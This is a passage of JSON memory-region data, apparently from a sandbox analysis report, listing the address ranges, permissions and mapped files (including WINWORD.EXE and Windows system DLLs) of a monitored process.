"{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db", "norm_filename": "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db", "region_type": "memory_mapped_file", "start_va": 34799616, "timestamp": "00:00:22.509", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 34996224, "type": "region", "version": 1 }, "end_va": 36044799, "entry_point": 0, "filename": null, "id": "region_183", "name": "private_0x0000000002160000", "norm_filename": null, "region_type": "private_memory", "start_va": 34996224, "timestamp": "00:00:22.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 36044800, "type": "region", "version": 1 }, "end_va": 40185855, "entry_point": 0, "filename": null, "id": "region_184", "name": "pagefile_0x0000000002260000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 36044800, "timestamp": "00:00:22.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 40239104, "type": "region", "version": 1 }, "end_va": 43184127, "entry_point": 40239104, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_185", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 40239104, "timestamp": "00:00:22.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 43188224, "type": "region", "version": 1 }, "end_va": 43192319, "entry_point": 0, "filename": null, "id": "region_186", "name": "private_0x0000000002930000", "norm_filename": null, "region_type": "private_memory", "start_va": 43188224, "timestamp": "00:00:22.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 43253760, "type": "region", "version": 1 }, "end_va": 43257855, "entry_point": 0, "filename": null, "id": "region_187", "name": "private_0x0000000002940000", "norm_filename": null, "region_type": "private_memory", "start_va": 43253760, "timestamp": "00:00:22.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 43384832, "type": "region", "version": 1 }, "end_va": 43388927, "entry_point": 0, "filename": null, "id": "region_188", "name": "private_0x0000000002960000", "norm_filename": null, "region_type": "private_memory", "start_va": 43384832, "timestamp": "00:00:22.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 43515904, "type": "region", "version": 1 }, "end_va": 43519999, "entry_point": 0, "filename": null, "id": "region_189", "name": "private_0x0000000002980000", "norm_filename": null, "region_type": "private_memory", "start_va": 43515904, "timestamp": "00:00:22.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 43646976, "type": "region", "version": 1 }, "end_va": 43651071, "entry_point": 0, "filename": null, "id": "region_190", "name": "private_0x00000000029a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43646976, "timestamp": "00:00:22.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 44171264, "type": "region", "version": 1 }, "end_va": 44175359, "entry_point": 0, "filename": null, "id": "region_191", "name": "private_0x0000000002a20000", "norm_filename": null, "region_type": "private_memory", "start_va": 44171264, "timestamp": "00:00:22.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 44236800, "type": "region", "version": 1 }, "end_va": 44240895, "entry_point": 0, "filename": null, "id": "region_192", "name": "pagefile_0x0000000002a30000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 44236800, "timestamp": "00:00:22.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 44302336, "type": "region", "version": 1 }, "end_va": 44306431, "entry_point": 0, "filename": null, "id": "region_193", "name": "private_0x0000000002a40000", "norm_filename": null, "region_type": "private_memory", "start_va": 44302336, "timestamp": "00:00:22.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 69632, "start_va": 44367872, "type": "region", "version": 1 }, "end_va": 44437503, "entry_point": 44367872, "filename": "\\Windows\\System32\\C_1255.NLS", "id": "region_194", "name": "c_1255.nls", "norm_filename": "c:\\windows\\system32\\c_1255.nls", "region_type": "memory_mapped_file", "start_va": 44367872, "timestamp": "00:00:22.510", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 44630016, "type": "region", "version": 1 }, "end_va": 45678591, "entry_point": 0, "filename": null, "id": "region_195", "name": "private_0x0000000002a90000", "norm_filename": null, "region_type": "private_memory", "start_va": 44630016, "timestamp": "00:00:22.511", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 45678592, "type": "region", "version": 1 }, "end_va": 46727167, "entry_point": 0, "filename": null, "id": "region_196", "name": "private_0x0000000002b90000", "norm_filename": null, "region_type": "private_memory", "start_va": 45678592, "timestamp": "00:00:22.511", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 46727168, "type": "region", "version": 1 }, "end_va": 47513599, "entry_point": 46727168, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_197", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 46727168, "timestamp": "00:00:22.511", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 47513600, "type": "region", "version": 1 }, "end_va": 48562175, "entry_point": 0, "filename": null, "id": "region_198", "name": "private_0x0000000002d50000", "norm_filename": null, "region_type": "private_memory", "start_va": 47513600, "timestamp": "00:00:22.517", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 520192, "start_va": 48562176, "type": "region", "version": 1 }, "end_va": 49082367, "entry_point": 48562176, "filename": "\\Windows\\Fonts\\segoeui.ttf", "id": "region_199", "name": "segoeui.ttf", "norm_filename": "c:\\windows\\fonts\\segoeui.ttf", "region_type": "memory_mapped_file", "start_va": 48562176, "timestamp": "00:00:22.517", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 49152000, "type": "region", "version": 1 }, "end_va": 49676287, "entry_point": 0, "filename": null, "id": "region_200", "name": "private_0x0000000002ee0000", "norm_filename": null, "region_type": "private_memory", "start_va": 49152000, "timestamp": "00:00:22.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 126976, "start_va": 49807360, "type": "region", "version": 1 }, "end_va": 49934335, "entry_point": 0, "filename": null, "id": "region_201", "name": "private_0x0000000002f80000", "norm_filename": null, "region_type": "private_memory", "start_va": 49807360, "timestamp": "00:00:22.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 49938432, "type": "region", "version": 1 }, "end_va": 50987007, "entry_point": 0, "filename": null, "id": "region_202", "name": "private_0x0000000002fa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 49938432, "timestamp": "00:00:22.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4194304, "start_va": 50987008, "type": "region", "version": 1 }, "end_va": 55181311, "entry_point": 0, "filename": null, "id": "region_203", "name": "pagefile_0x00000000030a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 50987008, "timestamp": "00:00:22.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 9633792, "start_va": 55181312, "type": "region", "version": 1 }, "end_va": 64815103, "entry_point": 55181312, "filename": "\\Windows\\Fonts\\StaticCache.dat", "id": "region_204", "name": "staticcache.dat", "norm_filename": "c:\\windows\\fonts\\staticcache.dat", "region_type": "memory_mapped_file", "start_va": 55181312, "timestamp": "00:00:22.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 64815104, "type": "region", "version": 1 }, "end_va": 65863679, "entry_point": 0, "filename": null, "id": "region_205", "name": "private_0x0000000003dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 64815104, "timestamp": "00:00:22.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 409600, "start_va": 65863680, "type": "region", "version": 1 }, "end_va": 66273279, "entry_point": 65863680, "filename": "\\Windows\\Fonts\\seguisb.ttf", "id": "region_206", "name": "seguisb.ttf", "norm_filename": "c:\\windows\\fonts\\seguisb.ttf", "region_type": "memory_mapped_file", "start_va": 65863680, "timestamp": "00:00:22.518", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 66781184, "type": "region", "version": 1 }, "end_va": 66846719, "entry_point": 0, "filename": null, "id": "region_207", "name": "private_0x0000000003fb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 66781184, "timestamp": "00:00:22.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 66846720, "type": "region", "version": 1 }, "end_va": 67895295, "entry_point": 0, "filename": null, "id": "region_208", "name": "private_0x0000000003fc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 66846720, "timestamp": "00:00:22.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 68550656, "type": "region", "version": 1 }, "end_va": 69074943, "entry_point": 0, "filename": null, "id": "region_209", "name": "private_0x0000000004160000", "norm_filename": null, "region_type": "private_memory", "start_va": 68550656, "timestamp": "00:00:22.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 69599232, "type": "region", "version": 1 }, "end_va": 70647807, "entry_point": 0, "filename": null, "id": "region_210", "name": "private_0x0000000004260000", "norm_filename": null, "region_type": "private_memory", "start_va": 69599232, "timestamp": "00:00:22.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 71041024, "type": "region", "version": 1 }, "end_va": 71106559, "entry_point": 0, "filename": null, "id": "region_211", "name": "private_0x00000000043c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 71041024, "timestamp": "00:00:22.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 71106560, "type": "region", "version": 1 }, "end_va": 72155135, "entry_point": 0, "filename": null, "id": "region_212", "name": "private_0x00000000043d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 71106560, "timestamp": "00:00:22.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 73138176, "type": "region", "version": 1 }, "end_va": 73203711, "entry_point": 0, "filename": null, "id": "region_213", "name": "private_0x00000000045c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 73138176, "timestamp": "00:00:22.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 73203712, "type": "region", "version": 1 }, "end_va": 81592319, "entry_point": 0, "filename": null, "id": "region_214", "name": "pagefile_0x00000000045d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 73203712, "timestamp": "00:00:22.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 81592320, "type": "region", "version": 1 }, "end_va": 82640895, "entry_point": 0, "filename": null, "id": "region_215", "name": "private_0x0000000004dd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 81592320, "timestamp": "00:00:22.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 83034112, "type": "region", "version": 1 }, "end_va": 84082687, "entry_point": 0, "filename": null, "id": "region_216", "name": "private_0x0000000004f30000", "norm_filename": null, "region_type": "private_memory", "start_va": 83034112, "timestamp": "00:00:22.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 84082688, "type": "region", "version": 1 }, "end_va": 86179839, "entry_point": 0, "filename": null, "id": "region_217", "name": "private_0x0000000005030000", "norm_filename": null, "region_type": "private_memory", "start_va": 84082688, "timestamp": "00:00:22.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 86441984, "type": "region", "version": 1 }, "end_va": 87490559, "entry_point": 0, "filename": null, "id": "region_218", "name": "private_0x0000000005270000", "norm_filename": null, "region_type": "private_memory", "start_va": 86441984, "timestamp": "00:00:22.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 89063424, "type": "region", "version": 1 }, "end_va": 90111999, "entry_point": 0, "filename": null, "id": "region_219", "name": "private_0x00000000054f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 89063424, "timestamp": "00:00:22.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16777216, "start_va": 90112000, "type": "region", "version": 1 }, "end_va": 106889215, "entry_point": 0, "filename": null, "id": "region_220", "name": "pagefile_0x00000000055f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 90112000, "timestamp": "00:00:22.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 107806720, "type": "region", "version": 1 }, "end_va": 108331007, "entry_point": 0, "filename": null, "id": "region_221", "name": "private_0x00000000066d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 107806720, "timestamp": "00:00:22.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 108855296, "type": "region", "version": 1 }, "end_va": 109379583, "entry_point": 0, "filename": null, "id": "region_222", "name": "private_0x00000000067d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 108855296, "timestamp": "00:00:22.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 110297088, "type": "region", "version": 1 }, "end_va": 110821375, "entry_point": 0, "filename": null, "id": "region_223", "name": "private_0x0000000006930000", "norm_filename": null, "region_type": "private_memory", "start_va": 110297088, "timestamp": "00:00:22.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 110821376, "type": "region", "version": 1 }, "end_va": 115015679, "entry_point": 0, "filename": null, "id": "region_224", "name": "private_0x00000000069b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 110821376, "timestamp": "00:00:22.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 115015680, "type": "region", "version": 1 }, "end_va": 119209983, "entry_point": 0, "filename": null, "id": "region_225", "name": "private_0x0000000006db0000", "norm_filename": null, "region_type": "private_memory", "start_va": 115015680, "timestamp": "00:00:22.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 119209984, "type": "region", "version": 1 }, "end_va": 127598591, "entry_point": 0, "filename": null, "id": "region_226", "name": "private_0x00000000071b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 119209984, "timestamp": "00:00:22.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 127598592, "type": "region", "version": 1 }, "end_va": 131796991, "entry_point": 0, "filename": null, "id": "region_227", "name": "private_0x00000000079b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 127598592, "timestamp": "00:00:22.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 131858432, "type": "region", "version": 1 }, "end_va": 136056831, "entry_point": 0, "filename": null, "id": "region_228", "name": "private_0x0000000007dc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 131858432, "timestamp": "00:00:22.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4198400, "start_va": 136118272, "type": "region", "version": 1 }, "end_va": 140316671, "entry_point": 0, "filename": null, "id": "region_229", "name": "private_0x00000000081d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 136118272, "timestamp": "00:00:22.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2097152, "start_va": 140378112, "type": "region", "version": 1 }, "end_va": 142475263, "entry_point": 0, "filename": null, "id": "region_230", "name": "private_0x00000000085e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 140378112, "timestamp": "00:00:22.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8388608, "start_va": 142475264, "type": "region", "version": 1 }, "end_va": 150863871, "entry_point": 0, "filename": null, "id": "region_231", "name": "pagefile_0x00000000087e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 142475264, "timestamp": "00:00:22.521", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4980736, "start_va": 150863872, "type": "region", "version": 1 }, "end_va": 155844607, "entry_point": 0, "filename": null, "id": "region_232", "name": "private_0x0000000008fe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 150863872, "timestamp": "00:00:22.521", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 155844608, "type": "region", "version": 1 }, "end_va": 160038911, "entry_point": 0, "filename": null, "id": "region_233", "name": "private_0x00000000094a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 155844608, "timestamp": "00:00:22.521", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 927203328, "type": "region", "version": 1 }, "end_va": 927268863, "entry_point": 0, "filename": null, "id": "region_234", "name": "private_0x0000000037440000", "norm_filename": null, "region_type": "private_memory", "start_va": 927203328, "timestamp": "00:00:22.521", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 622592, "start_va": 1943535616, "type": "region", "version": 1 }, "end_va": 1944158207, "entry_point": 1943535616, "filename": "\\Windows\\System32\\msvcp100.dll", "id": "region_235", "name": "msvcp100.dll", "norm_filename": "c:\\windows\\system32\\msvcp100.dll", "region_type": "memory_mapped_file", "start_va": 1943535616, "timestamp": "00:00:22.521", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 860160, "start_va": 1944190976, "type": "region", "version": 1 }, "end_va": 1945051135, "entry_point": 1944190976, "filename": "\\Windows\\System32\\msvcr100.dll", "id": "region_236", "name": "msvcr100.dll", "norm_filename": "c:\\windows\\system32\\msvcr100.dll", "region_type": "memory_mapped_file", "start_va": 1944190976, "timestamp": "00:00:22.550", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 208896, "start_va": 1958608896, "type": "region", "version": 1 }, "end_va": 1958817791, "entry_point": 1958608896, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL", "id": "region_237", "name": "osppc.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll", "region_type": "memory_mapped_file", "start_va": 1958608896, "timestamp": "00:00:22.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1999765504, "type": "region", "version": 1 }, "end_va": 2000941055, "entry_point": 1999765504, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_238", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1999765504, "timestamp": "00:00:22.581", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2000945152, "type": "region", "version": 1 }, "end_va": 2001969151, "entry_point": 2000945152, "filename": "\\Windows\\System32\\user32.dll", "id": "region_239", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2000945152, "timestamp": "00:00:22.807", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2001993728, "type": "region", "version": 1 }, "end_va": 2003734527, "entry_point": 2001993728, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_240", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2001993728, "timestamp": "00:00:22.869", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 2003894272, "type": "region", "version": 1 }, "end_va": 2003922943, "entry_point": 2003894272, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_241", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2003894272, "timestamp": "00:00:22.956", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_242", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:22.963", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_243", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:22.963", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_244", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:22.963", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1933312, "start_va": 5354029056, "type": "region", "version": 1 }, "end_va": 5355962367, "entry_point": 5354029056, "filename": "\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE", "id": "region_245", "name": "winword.exe", "norm_filename": "c:\\program files\\microsoft office\\office15\\winword.exe", "region_type": "memory_mapped_file", "start_va": 5354029056, "timestamp": "00:00:22.963", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 8790706683904, "type": "region", "version": 1 }, "end_va": 8790706749439, "entry_point": 0, "filename": null, "id": "region_246", "name": "private_0x000007febef30000", "norm_filename": null, "region_type": "private_memory", "start_va": 8790706683904, "timestamp": "00:00:22.971", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2240512, "start_va": 8791412834304, "type": "region", "version": 1 }, "end_va": 8791415074815, "entry_point": 8791412834304, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\OFFICE15\\RICHED20.DLL", "id": "region_247", "name": "riched20.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\office15\\riched20.dll", "region_type": "memory_mapped_file", "start_va": 8791412834304, "timestamp": "00:00:22.971", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1564672, "start_va": 8791417487360, "type": "region", "version": 1 }, "end_va": 8791419052031, "entry_point": 8791417487360, "filename": "\\Windows\\System32\\DWrite.dll", "id": "region_248", "name": "dwrite.dll", 